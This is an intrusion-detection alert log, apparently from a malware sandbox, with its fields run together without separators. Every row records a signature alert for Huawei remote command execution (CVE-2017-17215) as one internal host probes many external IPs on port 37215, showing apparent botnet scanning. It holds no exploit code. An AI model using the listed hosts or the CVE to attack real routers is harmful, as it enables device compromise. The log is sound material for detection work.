                                            06/14/24-10:43:43.943569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5325237215192.168.2.14197.242.59.220
                                            06/14/24-10:43:48.030073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5353037215192.168.2.14197.240.52.97
                                            06/14/24-10:43:50.072868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952837215192.168.2.14156.194.42.74
                                            06/14/24-10:43:45.984831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3332437215192.168.2.14156.113.143.74
                                            06/14/24-10:43:52.160368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4722637215192.168.2.1441.88.130.134
                                            06/14/24-10:44:33.149583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5191037215192.168.2.14156.92.133.19
                                            06/14/24-10:44:10.565309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4853237215192.168.2.1441.113.14.81
                                            06/14/24-10:44:35.176938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4608237215192.168.2.1441.52.206.60
                                            06/14/24-10:43:41.845894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5405037215192.168.2.14156.92.102.202
                                            06/14/24-10:44:02.368891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4832237215192.168.2.1441.194.29.220
                                            06/14/24-10:43:54.185384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5061637215192.168.2.14156.225.72.148
                                            06/14/24-10:44:00.342132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5740837215192.168.2.1441.19.76.211
                                            06/14/24-10:44:26.979891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4462637215192.168.2.1441.188.242.86
                                            06/14/24-10:44:14.669537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4535037215192.168.2.1441.139.109.2
                                            06/14/24-10:44:16.735080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3629637215192.168.2.1441.1.194.110
                                            06/14/24-10:44:22.878177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3349637215192.168.2.1441.145.103.112
                                            06/14/24-10:44:06.472646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6024437215192.168.2.1441.195.149.85
                                            06/14/24-10:43:36.702475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4412037215192.168.2.1441.151.195.87
                                            06/14/24-10:44:24.946968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3817237215192.168.2.14156.239.241.78
                                            06/14/24-10:44:22.861993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5054037215192.168.2.14197.112.205.41
                                            06/14/24-10:43:34.674905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4650437215192.168.2.14197.2.165.202
                                            06/14/24-10:44:00.325273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5467837215192.168.2.1441.230.15.61
                                            06/14/24-10:44:10.548750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3554037215192.168.2.14156.29.198.8
                                            06/14/24-10:44:14.669847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4075837215192.168.2.14156.134.4.157
                                            06/14/24-10:43:45.966501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3943437215192.168.2.1441.21.239.148
                                            06/14/24-10:44:06.472670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5057437215192.168.2.1441.251.124.122
                                            06/14/24-10:44:29.025011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5851837215192.168.2.14156.254.231.161
                                            06/14/24-10:44:33.152600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5339237215192.168.2.14156.225.101.230
                                            06/14/24-10:44:29.011180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5717837215192.168.2.14156.143.32.203
                                            06/14/24-10:44:20.804945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4525437215192.168.2.1441.119.234.121
                                            06/14/24-10:44:20.829898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5875837215192.168.2.1441.153.30.107
                                            06/14/24-10:44:10.547614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4975437215192.168.2.14197.134.247.219
                                            06/14/24-10:43:34.679561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4600037215192.168.2.14197.115.0.107
                                            06/14/24-10:43:54.181849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3821437215192.168.2.1441.40.99.143
                                            06/14/24-10:44:00.344508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3601237215192.168.2.1441.211.101.201
                                            06/14/24-10:43:54.184762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3840037215192.168.2.14156.141.145.153
                                            06/14/24-10:44:14.684567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3926437215192.168.2.1441.57.39.74
                                            06/14/24-10:43:58.290118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3928637215192.168.2.1441.169.26.226
                                            06/14/24-10:44:04.420663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5654237215192.168.2.1441.13.251.30
                                            06/14/24-10:44:16.733160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4678637215192.168.2.14197.172.103.190
                                            06/14/24-10:44:20.827381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3494837215192.168.2.14156.184.95.95
                                            06/14/24-10:43:45.989744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3740837215192.168.2.14197.252.202.160
                                            06/14/24-10:44:18.778107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5063837215192.168.2.14156.71.188.115
                                            06/14/24-10:44:31.050972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5147637215192.168.2.14156.185.3.251
                                            06/14/24-10:43:58.272935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4747637215192.168.2.1441.249.65.27
                                            06/14/24-10:43:56.226670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3696637215192.168.2.14197.213.255.126
                                            06/14/24-10:44:26.997432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5564237215192.168.2.14156.249.117.186
                                            06/14/24-10:44:16.718241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5110437215192.168.2.14156.25.206.165
                                            06/14/24-10:43:45.968032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3720837215192.168.2.14156.165.58.14
                                            06/14/24-10:43:58.277492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399837215192.168.2.1441.89.226.56
                                            06/14/24-10:43:58.276208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5946437215192.168.2.14197.236.142.236
                                            06/14/24-10:43:56.244334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5356237215192.168.2.1441.95.200.201
                                            06/14/24-10:44:02.368491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4260637215192.168.2.14156.247.12.189
                                            06/14/24-10:44:02.382553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4666437215192.168.2.14156.60.60.110
                                            06/14/24-10:44:04.411190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5763637215192.168.2.1441.138.199.145
                                            06/14/24-10:44:12.616281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5563837215192.168.2.14197.200.216.142
                                            06/14/24-10:43:43.969069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3284637215192.168.2.1441.44.124.101
                                            06/14/24-10:44:08.502405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4179237215192.168.2.14197.43.29.24
                                            06/14/24-10:43:37.762717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6025437215192.168.2.14197.21.18.100
                                            06/14/24-10:44:35.182731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4214637215192.168.2.14197.249.136.90
                                            06/14/24-10:43:43.942329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5990037215192.168.2.14197.59.146.202
                                            06/14/24-10:43:36.727874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5814637215192.168.2.14156.24.71.5
                                            06/14/24-10:44:20.805651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4694437215192.168.2.1441.11.172.128
                                            06/14/24-10:44:04.422307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5377837215192.168.2.14197.29.244.43
                                            06/14/24-10:43:41.850109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3684237215192.168.2.1441.65.51.58
                                            06/14/24-10:43:37.763365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4562837215192.168.2.1441.172.255.30
                                            06/14/24-10:44:29.014117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4959437215192.168.2.1441.164.194.70
                                            06/14/24-10:43:45.968868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5903437215192.168.2.1441.118.102.7
                                            06/14/24-10:43:45.967213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5763037215192.168.2.14197.232.164.114
                                            06/14/24-10:43:58.295392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4124237215192.168.2.14156.253.244.160
                                            06/14/24-10:43:39.789705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3452237215192.168.2.14156.244.1.164
                                            06/14/24-10:43:41.849639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3859637215192.168.2.1441.254.243.150
                                            06/14/24-10:43:43.944527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5146237215192.168.2.1441.123.133.78
                                            06/14/24-10:43:54.200578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4524837215192.168.2.14156.192.187.153
                                            06/14/24-10:44:35.181040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5097837215192.168.2.14156.224.200.85
                                            06/14/24-10:44:35.183064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3332237215192.168.2.14197.137.85.160
                                            06/14/24-10:44:06.471178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5553237215192.168.2.1441.157.239.22
                                            06/14/24-10:43:58.277428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5150037215192.168.2.14156.40.55.158
                                            06/14/24-10:44:31.083715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5784837215192.168.2.14156.61.172.179
                                            06/14/24-10:44:00.339790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5017237215192.168.2.14197.114.23.2
                                            06/14/24-10:44:31.050884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5431037215192.168.2.14156.154.114.172
                                            06/14/24-10:43:54.185164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5523837215192.168.2.14156.80.237.154
                                            06/14/24-10:44:18.776531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6029837215192.168.2.1441.80.174.39
                                            06/14/24-10:43:54.198516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4147837215192.168.2.14197.237.228.133
                                            06/14/24-10:43:36.717746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5587237215192.168.2.14156.157.145.42
                                            06/14/24-10:44:31.088890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4073437215192.168.2.14156.72.141.220
                                            06/14/24-10:44:20.829204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5771637215192.168.2.14197.33.128.48
                                            06/14/24-10:43:56.242238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4032037215192.168.2.1441.110.90.56
                                            06/14/24-10:43:50.111335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3989837215192.168.2.14197.106.58.250
                                            06/14/24-10:43:52.163549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3950637215192.168.2.14197.233.220.12
                                            06/14/24-10:44:02.384278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4872837215192.168.2.14156.179.183.35
                                            06/14/24-10:44:29.012702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4687437215192.168.2.1441.26.14.95
                                            06/14/24-10:43:52.159804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373237215192.168.2.1441.108.180.1
                                            06/14/24-10:43:41.896548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4143037215192.168.2.14197.217.192.190
                                            06/14/24-10:44:27.000295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4430237215192.168.2.14197.166.221.198
                                            06/14/24-10:43:39.811821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4608037215192.168.2.14197.205.170.169
                                            06/14/24-10:44:04.411018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3792237215192.168.2.14156.60.22.158
                                            06/14/24-10:43:54.186684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5315637215192.168.2.14156.69.85.65
                                            06/14/24-10:43:50.110804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913237215192.168.2.14156.108.63.186
                                            06/14/24-10:44:12.640622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4381037215192.168.2.14197.241.91.197
                                            06/14/24-10:43:41.900048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4791037215192.168.2.14197.86.169.113
                                            06/14/24-10:44:31.051362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4701237215192.168.2.14197.113.178.136
                                            06/14/24-10:43:56.228778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4580237215192.168.2.14156.5.42.74
                                            06/14/24-10:44:16.732616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3396637215192.168.2.14197.220.41.135
                                            06/14/24-10:44:04.409223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4709037215192.168.2.14197.81.168.219
                                            06/14/24-10:43:52.150619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4477237215192.168.2.1441.165.139.159
                                            06/14/24-10:44:24.917652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4268037215192.168.2.1441.143.234.38
                                            06/14/24-10:44:33.151221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3601837215192.168.2.14156.223.21.148
                                            06/14/24-10:44:31.056259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4813837215192.168.2.14197.197.171.136
                                            06/14/24-10:44:14.688742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4099437215192.168.2.14197.178.212.199
                                            06/14/24-10:44:20.805240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4710637215192.168.2.14156.133.254.44
                                            06/14/24-10:43:50.074816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5833437215192.168.2.1441.238.129.177
                                            06/14/24-10:44:33.133912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3549037215192.168.2.14197.54.167.18
                                            06/14/24-10:44:12.624946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4979037215192.168.2.14156.184.34.249
                                            06/14/24-10:44:14.670210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3755637215192.168.2.14197.87.232.118
                                            06/14/24-10:44:26.978376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4205437215192.168.2.14197.25.187.32
                                            06/14/24-10:43:41.848414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4258237215192.168.2.1441.16.169.33
                                            06/14/24-10:43:34.678282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5599637215192.168.2.14197.244.234.190
                                            06/14/24-10:44:00.342668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3600837215192.168.2.1441.81.122.121
                                            06/14/24-10:44:10.565530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5489237215192.168.2.1441.51.202.50
                                            06/14/24-10:44:26.978307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3615837215192.168.2.14197.203.176.20
                                            06/14/24-10:43:36.703177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5188237215192.168.2.14156.163.57.134
                                            06/14/24-10:43:34.677530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4352837215192.168.2.14156.13.174.42
                                            06/14/24-10:43:43.972013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176437215192.168.2.14197.193.113.163
                                            06/14/24-10:44:26.998270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5534837215192.168.2.1441.78.51.254
                                            06/14/24-10:44:00.341620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4351637215192.168.2.14156.249.151.9
                                            06/14/24-10:43:34.662099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3289437215192.168.2.1441.153.119.111
                                            06/14/24-10:44:08.503988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4316637215192.168.2.14156.126.20.13
                                            06/14/24-10:44:10.568897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5578837215192.168.2.14156.11.70.93
                                            06/14/24-10:44:14.682060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4908637215192.168.2.14197.156.173.230
                                            06/14/24-10:44:22.860060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5121637215192.168.2.14156.1.228.107
                                            06/14/24-10:43:48.034276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3554037215192.168.2.14156.154.223.49
                                            06/14/24-10:44:18.774954TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3322037215192.168.2.14197.34.19.80
                                            06/14/24-10:43:50.115780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5400437215192.168.2.14156.205.123.200
                                            06/14/24-10:43:50.071038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5435637215192.168.2.14156.45.98.10
                                            06/14/24-10:44:02.364802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4728037215192.168.2.14197.18.141.140
                                            06/14/24-10:44:14.681592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4227237215192.168.2.14156.163.51.17
                                            06/14/24-10:43:39.791388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3921037215192.168.2.1441.241.196.232
                                            06/14/24-10:44:02.383328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5429437215192.168.2.1441.127.223.227
                                            06/14/24-10:43:50.072832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4756637215192.168.2.1441.36.215.134
                                            06/14/24-10:43:58.291197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5589837215192.168.2.1441.25.16.23
                                            06/14/24-10:43:45.988908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3685837215192.168.2.1441.63.176.17
                                            06/14/24-10:44:08.503132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5574237215192.168.2.14197.34.48.125
                                            06/14/24-10:44:24.934845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5619837215192.168.2.1441.1.223.18
                                            06/14/24-10:43:45.989679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4770837215192.168.2.14197.100.163.88
                                            06/14/24-10:44:24.917180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5839237215192.168.2.14156.71.157.145
                                            06/14/24-10:44:24.941995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4421637215192.168.2.1441.31.205.245
                                            06/14/24-10:43:41.847506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4917037215192.168.2.14197.52.236.152
                                            06/14/24-10:44:04.423808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5943437215192.168.2.1441.234.125.130
                                            06/14/24-10:43:41.849078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5777837215192.168.2.14197.117.74.16
                                            06/14/24-10:44:18.761743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4944237215192.168.2.1441.139.175.97
                                            06/14/24-10:43:58.274724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3511037215192.168.2.14156.174.46.30
                                            06/14/24-10:44:33.149272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5475637215192.168.2.14197.204.25.11
                                            06/14/24-10:43:48.020729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3978837215192.168.2.14197.184.247.107
                                            06/14/24-10:44:26.979274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5114437215192.168.2.1441.222.89.222
                                            06/14/24-10:43:50.115650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3830637215192.168.2.14156.104.67.45
                                            06/14/24-10:44:33.133176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3936437215192.168.2.14156.206.99.39
                                            06/14/24-10:43:41.850672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5786837215192.168.2.1441.134.99.108
                                            06/14/24-10:44:26.977754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3652837215192.168.2.14197.56.117.39
                                            06/14/24-10:44:12.616866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4826037215192.168.2.1441.232.154.42
                                            06/14/24-10:44:35.182446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5824837215192.168.2.14156.249.94.242
                                            06/14/24-10:44:06.472203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4250037215192.168.2.14156.51.74.112
                                            06/14/24-10:44:27.000655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4393637215192.168.2.14197.121.202.144
                                            06/14/24-10:44:02.367211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3409037215192.168.2.14156.169.59.197
                                            06/14/24-10:44:16.715906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5043237215192.168.2.14197.249.160.113
                                            06/14/24-10:44:14.671920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4520237215192.168.2.14156.169.142.94
                                            06/14/24-10:43:36.726815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5400837215192.168.2.14197.254.127.54
                                            06/14/24-10:44:22.861159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5889437215192.168.2.14156.210.37.84
                                            06/14/24-10:44:33.131136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3535837215192.168.2.14156.204.50.183
                                            06/14/24-10:43:41.848799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5101637215192.168.2.14156.65.80.241
                                            06/14/24-10:44:04.424353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3762837215192.168.2.1441.37.103.215
                                            06/14/24-10:44:06.470511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4452437215192.168.2.1441.198.246.93
                                            06/14/24-10:44:00.338082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3792437215192.168.2.14156.41.8.116
                                            06/14/24-10:43:56.245864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4852437215192.168.2.14156.114.178.183
                                            06/14/24-10:44:16.737899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4850837215192.168.2.14197.58.204.6
                                            06/14/24-10:44:33.151443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114237215192.168.2.1441.195.134.39
                                            06/14/24-10:44:14.682177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4640637215192.168.2.1441.183.139.203
                                            06/14/24-10:44:12.625526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3527237215192.168.2.1441.210.137.251
                                            06/14/24-10:44:20.828891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4210837215192.168.2.14156.212.66.238
                                            06/14/24-10:44:02.386207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5918437215192.168.2.14156.222.100.132
                                            06/14/24-10:43:52.143237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239837215192.168.2.14156.209.155.242
                                            06/14/24-10:43:56.246095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3815037215192.168.2.14197.99.47.100
                                            06/14/24-10:43:39.792277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3536837215192.168.2.14156.100.46.16
                                            06/14/24-10:44:02.369151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5065037215192.168.2.14156.168.242.167
                                            06/14/24-10:44:29.027708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3304037215192.168.2.1441.255.165.235
                                            06/14/24-10:43:56.226826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3313637215192.168.2.1441.164.186.159
                                            06/14/24-10:44:08.504084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3608637215192.168.2.14197.50.195.57
                                            06/14/24-10:44:31.084609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3776637215192.168.2.1441.69.33.72
